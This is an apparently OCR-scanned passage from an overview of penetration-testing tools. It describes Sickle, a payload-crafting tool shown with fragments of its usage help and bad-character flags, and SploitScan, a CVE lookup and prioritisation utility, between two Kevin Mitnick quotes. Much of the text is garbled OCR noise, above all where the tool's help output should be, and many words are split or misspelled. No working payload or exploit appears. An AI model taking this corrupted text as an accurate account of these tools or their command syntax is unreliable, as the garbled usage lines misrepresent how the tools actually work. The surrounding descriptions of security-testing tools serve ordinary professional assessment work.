vector must be highly customized INot only does Sickle manipulate the effectiveness of a penetration test by the way of customizing Ipayloads tailored to specific situations, but also it contributes to the development of new innovativ e exploit techniques. "I was addicted to hacking, more for the intellectual challenge, the curiosity, the seduction of adventure; not for stealing, or causing damage or writing computer viruses." =Kevin Mitnick47 Sacer) usage: sickle-tool [-h] [-r READ] [-f FORMAT] [-s] [- [-m MODULE] [-a ARCH] [-b BADCHARS eS eS el Stet CL ear e CSC ere eC a eng UM aco SoC eae eC Met) ee nC eee Cree cL )) eR ee a eC OCC RCC OC sickle -s -f -b '\x00") aC aa eos CC Ee meneame etree acre CS es ee Car IR OME Tac Erreesealae] CSRS ae Su SD Ue MCCA CM tee astm Cee StL Cee) m MODULE, --module MODULE Ce Cenc PwC eee ae ee cra ee ee Cee CR ee UU) see CR aes PC TCU Gu LU ea eee Babtis list all available formats and argu 6.SploitScan SploitScan is a command1ine utility that puts at the pen tester's disposal one of the largest sources ffor looking up CVEs. It aggregates a number of sources of cybersecurity databases, including MI- TRE, CISA, and EPSS, among others, to provide detailed information on known vulnerabilities a. Ind their exploitability together with patch priorities. This library is especially useful for a penetrati lon tester running vulnerability assessment and management. It enables the penetration tester to fu. hther prioritize vulnerabilities according to their impact and whether exploits are publicly availabl- lc. The export option in JSON or CSV formats permits easy integration with other tools or maki ldetailed reporting possible, making SploitScan an essential tool in managing the complexity of mo dern threats against cybersecu "T got so passionate about technology. Hacking to me was like a video game. It was about gelting trophies. I just kept gouig on and on, despite all the trouble I was getting into, because I was hooked." -Kevin Mitnick